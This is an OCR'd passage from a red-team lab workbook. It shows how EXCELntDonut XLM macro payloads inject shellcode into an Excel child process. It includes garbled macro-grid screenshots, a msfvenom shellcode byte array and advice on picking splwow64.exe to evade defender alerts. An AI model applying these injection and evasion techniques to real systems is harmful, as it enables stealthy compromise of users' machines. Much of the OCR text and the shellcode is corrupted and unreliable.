Smart Lookup

Insert...
Delete...

Clear Contents

Mew Comment

MNew Mote

Eormat Cells...

AR(15=CHAR(72) &CHAR(1¢
\R(1)& =CHAR(130) &CHAR(¢
\R(4)& =CHAR(39) &CHAR(7:
HAR(Z =CHAR(1)&CHAR(20¢
HAR{1=CHAR(227)&CHAR(!
HAR(1=CHAR(37)&CHAR(1;
AR[48 =CHAR(251) &CHAR(:
AR(25 =CHAR(75)&CHAR(1:
AR[40=CHAR(227) &CHAR(<
HAR(S=CHAR(45)&CHAR(1(
HAR(S=CHAR(118)&CHAR(:
AR{2: =CHAR(170) &CHAR(:
AR[15=CHAR(171) &CHAR(1

®

, Col 1 100%

Executing Macro Code, Step 1

Unix (LF)

Macro

Macro name:

a1 +
Macros in: | All Open Workbooks w
Description

Eun
Step Into
Edit
Create
Delete

Cptions...

Executing Macro Code, Step 2

Page 13
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10. If the payload executes successfully, you should see the numbers in cell D1 rapidly count up and then a message

box will appear.

A . B . C D . E . F N
1 |=GOTO(A2) _=CHAR(235)&CHAR(: =CHAR(72) &CHAR(4{1074
2 |=GOTO(A3) |=CHAR(163) &CHAR(: =CHAR(72) &CHAR(1£5
3 |=GOTO(A4) =CHAR(5)&CHAR(21) =CHAR(212) &CHAR(]
4 |=GOTO(AS) =CHAR(28)&.CHAR(3/=CHAR(3] ¢ 1o ) >
5 |=GOTO(AG) =CHAR(240) &CHAR(1=CHAR(87
6 |=REGISTER("Kernel3:=CHAR(64) &CHAR(1:=CHAR(2(
7 |=REGISTER("Kernel3!=CHAR(187)&CHAR(: =CHAR(1( | 64-bit Shellcode Executed
8 |=REGISTER("Kernel3:=CHAR(59) &CHAR(65 =CHAR( 24 :
9 |=IF(ISNUMBER(SEAR =CHAR(43) &CHAR(1(=CHAR(29
10 |=Valloc(0,65536,409¢ =CHAR(224) &CHAR(£ =CHAR( 2
11 |main=$8%1 =CHAR(59) &CHAR (15 =CHAR(97 .
12 |=SET.VALUE(DL,0) =CHAR(141)&CHAR(¢=CHAR(127)&CHAR(:
13 |=WHILE[main<>"exci=CHAR(15) &CHAR( 1% =CHAR(252) &CHAR(:
14 |=SET.VALUE(D2,LEN( =CHAR(254) &CHAR(1=CHAR(153) &CHAR(S -
Macrol | Sheetd | ® 1 3
Ready = ] + 1005

Successful XLM Macro Execution

11. Unlike the payload in the previous lab exercise that just executed a command, this payload spawned a new
process and then injected shellcode into the process to cause the message box to displayed. You can observe
the effect of this behavior on the process tree by leaving the message box open and running Process Explorer

with the icon on the Desktop.

Insert

A

EXCELntDo... -

Page Layout Formulas Data Review View Help

5

B

=GOTO(A4)

i3

1
2
3
4
5
6
T
a
g

|=GoTO(A2) =CHAR(235)&CHAR(: =CHAR(72) &CHAR(4< 1074

|=6oTO(A3) —CHAR(163)&C
~GOTO(A4) ~CHAR(5)&CH/
=GOTO[AS5) |=CHAR(28)&CH
|=GoTo(A8) =CHAR(240)&C
|=REGISTER("Kernel3: =CHAR(64) &CH
|=REGISTER("Kernel3: =CHAR(187)&(
~REGISTER("Kernel3: =CHAR(59) &CH

|=IF(ISNUMBER(SEAR =CHAR(43)&C

Easy Money! >

&4-bit Shellcode Executed

A miomal D s mds i A mioani 0o s ol

Macro1

Red Team: Getting Access

Sheetl |

®

Executing Process Explorer
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12. Listed beneath Excel in the Process Explorer window, you will see "mstsc.exe". This is the program that was
executed by the payload in order to inject the message box shellcode.

¥ Process Explorer - Sysinternals: www.sysinternals.com [CLIENTTWWMuser] (Administrator) — O >
File Options View Process Find Users Help
@ HE0OR &% A | i | | 1 |
Process CPU  Private Bytes Working Set PID Description Comparty ™
[z] carss.exe 0.0 1720 K 5844 K 4276 Client Server Runtime Process Microsoft C
=l [m5 winlogon exe 2184 K 10,064 K 4660 Windows Logon Application  Microsoft C
[z fortdrvhost exe 4108 K 9,784 K 4688 Usemode Font Driver Host Microsoft C
[n=] dwm.exe 0.04 32892 K 69,768 K 1320 Desktop Window Manager Microsoft C
o S i o 2o —
SecurityHealth Systray exe 1636 K 2,940 K 7736 Windows Security notficatio... Microsoft C
%, OneDrive exe 15,884 K 61428 K 7976 Microsoft Onelrive Microsoft C
2 pro 0.81 24136 K 41272 K 8260 Sysintemals Process Explorer  Sysintemal:
<0.01 64476 K 126,196 K 3608 Microsoft Excel Microsoft C
2232 K 10,864 K 8600 Remote Desktop Connection  Microsoft C
=/ = cmd exe 2048 K 3748 K 3152 Windows Command Processor Microsoft C
[E8 conhost exe 6,992 K 15,368 K 4856 Console Window Host Microsoft C
W
L4 >

CPU Usage: 1.39%  Commit Charge: 18.08% Processes: 137 Physical Usage: 23.61%

MSTSC in Excel Process Tree

13. If you were to open EXCELntDonut's "processinjection.cs" template file on your Kali VM, you could also see
where the 32-bit and 64-bit versions of the "mstsc.exe" program are specified beneath the 32-bit and 64-bit
shellcode blocks in the file.

36 //x64

37 Ji/msfvenom -p windows/x64/exec CMD=calc EXITFUNC=thread
38 shellcode = new byte[272] {

39 Oxfc,0x48,0x83,0xed,0xf0,0xe8,0xchd,0x00,0x00,0x00,0
40 Ox51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0
41 Ox8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0
42 Ox48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0
43 0x01,0xcl,Oxe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0
44 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0
45 Oxd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0
46 Oxff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0
47 Oxac,0x41,0xcl,0xc9,0x0d,0x4]1,0x01,0xcl,0x38,0xe0,0
48 Ox24,0x08,0x45,0x39,0xd1l,0x75,0xd8,0x58,0x44,0x8b,0
49 Ox66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0
50 Ox88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0
51 Ox41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xed,0
52 Ox8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0
53 Ox00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0
54 Ox87,0xff,0xd5,0xbb,0xed,0x1d,0x2a,0x0a,0x41,0xba,®
55 Oxd5,0x48,0x83,0xcd,0x28,0x3c,0x06,0x7c,0x0a,0x80,0
56 0x47,0x13,0x72,0x6T,0x6a,0x00,0x59,0x41,0x89,0xda,d
57 Ox63,0x00 };

58 |process = ”E:\\Windows\\SystemBZ\\mstsc.exe“ﬂ

64-bit Target Process in processinjection.cs

14. You can now close the message box and the Excel program window and proceed to the next section.
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3. Finding a less suspicious process for shellcode injection:

If you do need to execute a child process, you would want to execute a process that makes sense in the context of the
parent process that is executing it. "mstsc.exe" (the Windows Remote Desktop client) is still a pretty suspicious child
process of Excel since it does not get executed by Excel during normal use by the average end user. To find a better child
process to inject into, we'll use Process Explorer to observe what child processes Excel executes during normal use.

1. First, start Process Explorer so you can use it to observe the behavior of the Excel process. Then start Excel and
create a new spreadsheet document.

&Y Process Explorer - Sysinternals sysinternals.com [CLIENTTWWMuser] (Administrator — O >

File Options View Process Find Users Help

d@=eaR|sxae | [ || 2 T 1 O 1

Process CPU  Private Bytes  Working Set FID  Description Company = ™

[n=]dwm exe 0.66 366K 68.096 K 1320 Desktop Window Manager Microsoft C

= g Explorer exe 108 47,092 K 124316 K| 5784 Windows Explorer Microsoft C

Q; SecurityHealthSystray exe 1636 K 2940 K 7736 Windows Securty notfficatio... Microsoft C

%, OneDrive exe 15,884 K 61412 K 7576 Microsoft OneDrive Microsaft C

2 procexp 64 exe 123 24012 K 43612 K 8260 Sysintemals Process Explorer  Sysintemal:

ﬂ EXCEL.EXE 79 84,356 K 136,472 K 9084 Microsoft Excel Microsoft C
v

i< >

CPU Usage: 10.31% Commit Charge: 18.13% Processes: 131 Physical Usage: 23.55%

AutaSave (@ oft) Book! - Excel je
File Home Insert Page Layout Formulas Data Review View Help 1% Share -
Ifﬁ A A = 9% Ml Conditional Formatting ~ i= 0 g
- F t as Table
Paste EB Font Alignment | Mumber E‘E ormatas fabie Cells Editing Analyze
N . . = 7 Cell Styles ~ - - Data
Clipboard ] Styles Analysis Sensitivity A
D2 - S ~7
A B C D E F €] H J K -
1
: L]
3
4
5
ﬁ b
Sheetl ® 1 3
Ready H 0 - i +  100%

Running Process Explorer and Excel

2. Now you need to perform actions that a regular user might perform in Excel that would generate a child
process. Common examples of regular user actions that may spawn child processes (depending on what
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program you're observing) are accessing Help documentation and printing files. For this exercise, try beginning
the print process in Excel by clicking on the "File" menu and then clicking "Print".

Bookl - Excel

File Home Insert Page Layout Formulas Data Review View Help

& Calibri 1o~ == = EEA General + | [l Conditional Formatting ~ &

|:| [‘EI - B I U~ AA | === = $ ~9L 9 B Format as Table ~ =

& e | O A =53z | 8. 0 .o [BZ Cell Styles ~ fi
Clipboard R Font i Alignment la Mumber la Styles
G19 v Jx

A . B . C . D . E . F G H . . ] .
1 —

Clicking the File Menu

Good afternoon

Y B C

Take a tour Drop-down list
K1
Blank workbook Welcome to Excel Drop-down tutorial
£ Search
Clicking Print
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3. With the "Print" interface still shown in Excel (without actually printing anything), look at Excel's process tree in
Process Explorer. You should see "splwow64.exe".

Print
Ifg,] Copies: | 1 .

Print

Printer
=,  Microsoft XP5 Documen... . We didn't find anything to print.
<=

Ready

Printer Properties

Settings
@ Print Active Sheets .

Only print the active she... -

: : \ I 1

¥ Process Explorer - Sysinternals: www.sysinternals.com [CLIENTT\WMuser] (Administrator) — O >

File Options View Process Find Users Help

d @ =200 & <@ || 2P | | | L] |

Process CPU  Private Bytes  Working Set PID  Description Company = *
=) g Explorer.exe 0.02 45,880 K 123,956 K 5784 Windows Explorer Microsoft C
$ SecurityHealthSystray exe 1,636 K 25940 K 7736 Windows Securty notificatio... Microsoft C
@, OneDrive exe 15,884 K 61 412K 7976 Microsoft OneDrive Microsoft C
L 23452 K 42816 K 8260 Sysintemals Process Explorer  Sysintemal
60,236 K 134636 K 9084 Microsoft Excel Microsoft C

s splwow b exe

2532 K 12584 K 5688 Print driver host for applicatio.. Microsaoft C

< >

ICPU Usage: 1.22%  Commit Charge: 17.90% Processes: 130 Physical Usage: 23.45%

"splwowe64.exe" in the Excel Process Tree

4. Many users are likely to print a document (or at least click the Print button) at some time while using Excel.
Therefore, this process is an excellent choice for use in real-world payloads. If defenders receive an alert every
time a user in their environment clicks "Print" in Excel, they're going to receive several times as many false-
positive alerts than alerts for actual malware.

By right-clicking on "splwow64.exe" in Process Explorer and clicking "Properties...", you can view the location of
"splwow64.exe" on the hard disk. You can also observe the command-line arguments used when the program
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was executed by Excel and whether the program is a 32-bit or 64-bit executable. Since "splwow64.exe" is a 64-
bit executable file, it will only be suitable for injecting 64-bit shellcode.

[ ———— KT Frocess Del
£¥ Process Explorer - Sys Kill Process Tree Shift+Del  YMuser] (Administrator) —
File Options View P Restart
H|g‘||5@£ Suspend

Process Create Dump 5 Private Bytes Waorking Set PID'  Description

=) gy Explorer.exe 47,020 K 124436 K 5784 Windows Explorer
3 SecurityHealthSyst Check VirusTotal 1636 K 25940 K 7736 Windows Security notifil
% OneDrive exe . 19,884 K 61472 K 7976 Microsoft OneDrive
2 procexpbd exe Properties... M IIBK A4 404 K 8260 Sysintemals Process Ey

= B EXCEL EXE Search Online... 39,792 K 138228 K 5084 Microsoft Excel

Egég aplwow6d exe

ra

2872K 12960 K 5628 Print driver host for appli

"splwowé64.exe" Properties Option

o splwowbd,exe: 5688 Propert

m
[

GPU Graph Threads TCR/IP Security Environment Strings
Image Performance Performance Graph Disk and Metwork

Image File

7 Print driver host for applications

Version: 10,0.19041. 746
Build Time:
Path:

— O X

C:\Windows\splwows.exe

| Explore

Command line:

| Ciwindows\splwowa4.exe 12288

Current directory:

| Co\Windows),

Autostart Location:

| nfa

| Explore

Parent: EXCEL.EXE(2054)
ser: CLIENT 1\WMuser

Verify

Started:  12:56:01PM  2/28/2021 || Image: 64-bit

Bring to Front

Comment: |

| Kill Process

VirusTotal: |

| | Submit

Data Execution Prevention (DEP) Status: Enabled (permanent)
Address Space Load Randomization: Bottom-Up

Control Flow Guard: Enabled

Enterprise Context: MJA
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5. You can change the child process that EXCELntDonut uses for injecting shellcode by modifying the "process"
variables in the template file and then rebuilding your payload. For the purpose of this exercise, this has already
been done for you. Open the file "EXCELntDonut_Payload_2.xIsm" included in the lab exercises folder on your
desktop, and then click "Enable Content" in Excel to execute the payload.

AutoSave (@ off) - EXCELntDonut_Payload 2 - jo
File Home Insert Page Layout Formulas Data Review View Help It Share -
[hA &l (= % | | E E | P
- F t as Table ~
Paste EB Font Alignment | Mumber ﬁf‘% crmatas fabie Cells Editing
, - - - [B7 Cell Styles ~ = =
Clipboard = Styles Analysis Sensitivity ~
@ SECURITY WARNING Macros have been disabled. Enable Content x
05 - I v
A . B . C 3] E . F -
1 |=GOTO(AZ) =CHAR(235)&CHAR(Z=CHAR(72) &CHAR(4¢ 1074
2 |=GOTO(A3) =CHAR(28)&CHAR(7) =CHAR(72) &CHAR(1<5
3 |=GOTO(A4) =CHAR(2)&CHAR(14) =CHAR(147) &CHAR(]
4 | =E0TO(AS) =CHAR(B0)&CHAR(3E =CHAR(39) &CHAR(7:
5 |l—=mnTniasg) ~FUARII23NRCHARL —CHAR1R) RCHARR] | -
Macrol | Sheetl | ) 1 v
- 1 +  100%

"Enable Content" in EXCELntDonut_Payload 2.xIsm
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6. After the payload executes and the message box is displayed, observe Excel's process tree in Process Explorer to
confirm that the payload executed within the context of the less suspicious "splwow64.exe" program.

EXCELntDonut_Payl

File Home Insert Page Layout Formulas Data Review View Help 1= Share -
Rk A = % | | E @ R4
= F t as Table ~ ]
[E‘ Font | Alignment | Mumber ﬁ;ﬁ ormetes e — Editing
& - - - Easy Money! x w
Clipboard ] Analysis Sensitivity .
D5 - I | E4-bit Shellcode Executed v
A | B | | E | F -
1 | =GOTO(AZ) =CHAR(235)&CHAR(: =(
2 |=G OTO(A3) =CHAR(28)&CHAR(7) = — .
3 |=G OTO(A4) =CHAR(2)&CHAR(14) =CHAR(147) &CHAR(
4 |=G OTO(AS) =CHAR(80)&CHAR(3E =CHAR(339) &CHAR(7:
3 |=G OTO|AB) =CHAR(233)&CHAR({ =CHAR(16) &CHAR(B:
6 | =REGISTER("Kernel3; =CHAR(57)&CHAR(6: =CHAR(22) &CHAR(1f -
Macrol | Sheetl | @ 1 5
- i +  100%
¥ Process Explorer - Sysinternals: www.sysinternals.com [CLIENTT\WMuser] (Administrator) — O ot
File Optiocns View Process Find Users Help
H @208 &R ad |, || ] I |
Process CPU  Private Bytes Working Set PID' Description Comparry | *™
[z fortdrvhiost exe 4120 K 9832 K 4638 Usemnode Fort Driver Host Microsaft C
[mz] dwm.exe 025 AE2K 68,859 K 1320 Desktop Window Manager Microsoft C
2. 0.1 49,064 K 130,440 K
SecurityHealth Systray exe 1636 K 8540 K 7736 Windows Securty notificatio. .. Microsaft C
#®, OneDrive exe 19,884 K 61 412K 7976 Microsoft OneDrnve Microsaft C
/ 64 exe 0.84 23528 K 43532 K 8260 Sysintemals Process Explorer  Sysintemal:
=] ﬂ EXCEL.EXE 0.11 95,308 K 136,604 K 7968 Microsoft Excel Microsoft C
i splwowb4 exe 0.m 1,700 K 8888 K 6100 Print driver host for applicatio. .. Microsaoft C %
£ >
CPU Usage: 2.01%  Commit Charge: 18.49% Processes: 135 Physical Usage: 23.92%

Shellcode Injected into "splwow64.exe"

Additional resources

e EXCELntDonut project on GitHub
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https://github.com/FortyNorthSecurity/EXCELntDonut

